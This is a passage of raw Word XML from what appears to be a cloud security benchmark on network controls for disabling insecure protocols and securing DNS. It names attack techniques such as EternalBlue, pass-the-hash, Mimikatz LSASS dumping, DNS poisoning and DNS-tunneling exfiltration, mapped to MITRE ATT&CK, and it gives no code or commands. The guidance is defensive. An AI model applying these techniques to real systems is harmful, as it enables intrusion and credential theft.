        </w:rPr>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidR="00134E62" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B3F04D" w14:textId="17FF62F7" w:rsidR="002A6886" w:rsidRPr="00E53977" w:rsidRDefault="00134E62" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptographic Weakness Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879F862" w14:textId="1BF3F2F2" w:rsidR="00BE522A" w:rsidRPr="00E53977" w:rsidRDefault="00134E62" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Unauthorized Access via Protocol Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE93135" w14:textId="34AA12CF" w:rsidR="00BE522A" w:rsidRPr="00E53977" w:rsidRDefault="00BE522A" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>SSHv1 and SMBv1 vulnerabilities (e.g., CVE-2001-1473, CVE-2017-0144/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>) allow remote code execution or unauthenticated access, enabling initial footholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFA4DB" w14:textId="096DE01B" w:rsidR="000D3BE5" w:rsidRPr="00E53977" w:rsidRDefault="000D3BE5" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Credential Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA5015" w14:textId="396F3335" w:rsidR="000D3BE5" w:rsidRPr="00E53977" w:rsidRDefault="000D3BE5" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">LM/NTLMv1 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>wDigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> store weak hashes or plaintext credentials, vulnerable to pass-the-hash or memory scraping (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> extracting LSASS data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D234677" w14:textId="61432E68" w:rsidR="00B67506" w:rsidRPr="00E53977" w:rsidRDefault="00B67506" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374FD794" w14:textId="5E356D39" w:rsidR="00B67506" w:rsidRPr="00E53977" w:rsidRDefault="00B67506" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBv1's unencrypted sessions and exploits (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>) enable malware propagation or credential relay across networ</w:t>
      </w:r>
      <w:r w:rsidR="00CF0AED" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F9152" w14:textId="55720BA9" w:rsidR="00CF0AED" w:rsidRPr="00E53977" w:rsidRDefault="00CF0AED" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90F3E1" w14:textId="793F48F7" w:rsidR="00CF0AED" w:rsidRDefault="00CF0AED" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A22777" w14:textId="53BDE7D4" w:rsidR="00A92251" w:rsidRPr="00E53977" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6C096" w14:textId="205F2898" w:rsidR="00CF0AED" w:rsidRDefault="00CF0AED" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D713CB7" w14:textId="4F2761AB" w:rsidR="00A92251" w:rsidRPr="00E53977" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1003 - OS Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CC7E1" w14:textId="51866994" w:rsidR="00CB27F3" w:rsidRDefault="00CF0AED" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A487FBA" w14:textId="4E6196B3" w:rsidR="00A92251" w:rsidRPr="00E53977" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1021 - Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F26AC" w14:textId="0E3D7BD2" w:rsidR="00AE72FE" w:rsidRDefault="00AE72FE" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-8.1: Detect and disable insecure services and protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736F378A" w14:textId="326A870F" w:rsidR="009B38B0" w:rsidRPr="009B38B0" w:rsidRDefault="009B38B0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009B38B0">
        <w:t xml:space="preserve">Use Microsoft Sentinel's built-in Insecure Protocol Workbook to discover and mitigate insecure services and protocols across your Azure environment. This workbook identifies usage of protocols and services that do not meet appropriate security standards, such as SSL/TLSv1, SSHv1, SMBv1, LM/NTLMv1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B38B0">
        <w:t>wDigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B38B0">
        <w:t>, weak ciphers in Kerberos, and unsigned LDAP binds. After identification, disable these insecure protocols and services. When disabling is not feasible, implement compensating controls to reduce the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71BE2A" w14:textId="5F6D011A" w:rsidR="000B3AC0" w:rsidRPr="00E53977" w:rsidRDefault="000B3AC0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Discover insecure protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21941A" w14:textId="4C0E5E62" w:rsidR="000B3AC0" w:rsidRPr="00E53977" w:rsidRDefault="000B3AC0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Microsoft Sentinel's Insecure Protocol Workbook to identify usage of SSL/TLSv1, SSHv1, SMBv1, LM/NTLMv1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>wDigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>, weak Kerberos ciphers, and unsigned LDAP binds across your environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566E36C" w14:textId="126DCC4D" w:rsidR="00657247" w:rsidRPr="00E53977" w:rsidRDefault="00657247" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Disable insecure services and protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDC09CE" w14:textId="5598E898" w:rsidR="00657247" w:rsidRPr="00E53977" w:rsidRDefault="00657247" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement compensating controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3CC25" w14:textId="3E821F29" w:rsidR="00FD4D10" w:rsidRPr="00E53977" w:rsidRDefault="00FD4D10" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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61E51CCC" w14:textId="0935663D" w:rsidR="001072B1" w:rsidRPr="00E53977" w:rsidRDefault="001072B1" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc242449477"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>NS-10: Ensure Domain Name System (DNS) security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="12A5CDF0" w14:textId="08733876" w:rsidR="00206C93" w:rsidRPr="00E53977" w:rsidRDefault="00206C93" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B3C38" w14:textId="07B8253E" w:rsidR="00744A93" w:rsidRPr="00E53977" w:rsidRDefault="00744A93" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Ensure that Domain Name System (DNS) security configuration protects against known risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4192DF" w14:textId="29BBC4F3" w:rsidR="00744A93" w:rsidRPr="00E53977" w:rsidRDefault="00744A93" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ensure your DNS security strategy also includes mitigations against common attacks, such as dangling DNS, DNS amplifications attacks, DNS poisoning and spoofing, and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF10309" w14:textId="160F216C" w:rsidR="00F302F8" w:rsidRPr="00E53977" w:rsidRDefault="00F302F8" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC7E4A" w14:textId="7C6277DC" w:rsidR="00F302F8" w:rsidRPr="00E53977" w:rsidRDefault="00F302F8" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS spoofing/poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD9F92" w14:textId="50F91341" w:rsidR="00B33538" w:rsidRPr="00E53977" w:rsidRDefault="0096565E" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS amplification attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B376700" w14:textId="5D23C990" w:rsidR="00B33538" w:rsidRPr="00E53977" w:rsidRDefault="00B33538" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Dangling DNS exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028145AF" w14:textId="35F97F9B" w:rsidR="00C504B3" w:rsidRPr="00E53977" w:rsidRDefault="00C504B3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Data exfiltration via DNS tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E58E3" w14:textId="59A7DCBE" w:rsidR="00C504B3" w:rsidRPr="00E53977" w:rsidRDefault="00C504B3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Phishing/malware delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6891214B" w14:textId="619D446E" w:rsidR="00CB27F3" w:rsidRDefault="00457EF5" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Compromised resolvers redirect legitimate domains to attacker-controlled IPs, delivering phishing pages or malware to unsuspecting clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37606F6F" w14:textId="414F41FC" w:rsidR="00457EF5" w:rsidRPr="00E53977" w:rsidRDefault="00457EF5" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B6AE5" w14:textId="23F26F65" w:rsidR="00457EF5" w:rsidRDefault="00457EF5" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B043C7" w14:textId="0CD1125D" w:rsidR="009B38B0" w:rsidRPr="00E53977" w:rsidRDefault="009B38B0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B38B0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1071.004 - Application Layer Protocol: DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3111EE10" w14:textId="5C1F7CD8" w:rsidR="005A2E4F" w:rsidRDefault="005A2E4F" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057605F2" w14:textId="2F2316FA" w:rsidR="009B38B0" w:rsidRPr="00E53977" w:rsidRDefault="009B38B0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B38B0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1040 - Network Sniffing</w:t>
      </w:r>
    </w:p>
